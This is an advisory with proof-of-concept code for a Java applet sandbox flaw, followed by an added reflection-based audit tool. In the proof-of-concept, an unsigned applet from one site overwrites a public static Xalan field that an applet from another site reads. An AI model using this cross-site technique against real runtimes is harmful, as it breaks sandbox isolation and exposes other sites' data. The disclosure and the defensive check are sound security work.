Sun Java Cross-Site Applet Sandbox Security Model Violation Vulnerability
The following proof-of-concept was provided to demonstrate that there is a violation of the Java sandbox security model:

Two applets:
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class

The applet from siteB can read and write a variable that is also used by the applet from siteA. Data protection is therefore not guaranteed: an unsigned applet may grab data stored in this variable by a signed applet, or interfere with its XML processing, which violates the isolation restriction of the sandbox.

==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */
import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {
    public void paint(Graphics g) {
        // Print the current value of the shared static field on every repaint
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

    static {
        // Print the value once when the class is loaded
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }
}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;

public class WriteApplet extends java.applet.Applet {
    public void paint(Graphics g) {
        // Append to the shared static field on every repaint
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }

    static {
        // Overwrite the shared static field when the class is loaded
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA";
    }
}
==========WRITEAPPLET=========================

=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>
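A defensive check for the condition the proof-of-concept depends on, a static field that any code sharing the class can reassign. This is an added example, not part of the original advisory or the author's code; `SharedStaticAudit` and `SampleVersion` are hypothetical names, and the sample class is constructed to mirror the `S_VERSION` pattern.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.List;

public class SharedStaticAudit {

    // Constructed stand-in for a library class; it mirrors the S_VERSION pattern only.
    public static class SampleVersion {
        public static String S_VERSION = "1.0";         // reassignable by any caller
        public static final String PRODUCT = "sample";  // constant, cannot be reassigned
        public static final int[] PARTS = {1, 0};       // final reference, mutable contents
        private static String internal = "x";           // not directly reachable by other classes
    }

    /** Lists public static fields that other code sharing this class could alter. */
    public static List<String> findSharedMutableStatics(Class<?> cls) {
        List<String> findings = new ArrayList<>();
        for (Field f : cls.getDeclaredFields()) {
            int m = f.getModifiers();
            if (!Modifier.isPublic(m) || !Modifier.isStatic(m)) {
                continue; // only fields every caller can reach through the class name
            }
            if (!Modifier.isFinal(m)) {
                findings.add(cls.getName() + "." + f.getName() + ": reassignable");
            } else if (f.getType().isArray()) {
                findings.add(cls.getName() + "." + f.getName() + ": final array, elements writable");
            }
        }
        return findings;
    }

    public static void main(String[] args) throws ClassNotFoundException {
        // Audit the classes named on the command line, or the constructed sample if none are given.
        if (args.length == 0) {
            findSharedMutableStatics(SampleVersion.class).forEach(System.out::println);
            return;
        }
        for (String name : args) {
            // initialize=false: inspect the class without running its static initializers
            Class<?> cls = Class.forName(name, false, SharedStaticAudit.class.getClassLoader());
            findSharedMutableStatics(cls).forEach(System.out::println);
        }
    }
}
```

Run without arguments, it reports `S_VERSION` and `PARTS` from the sample class; fields it flags in real code are candidates for `final`, immutable types, or accessor-only exposure.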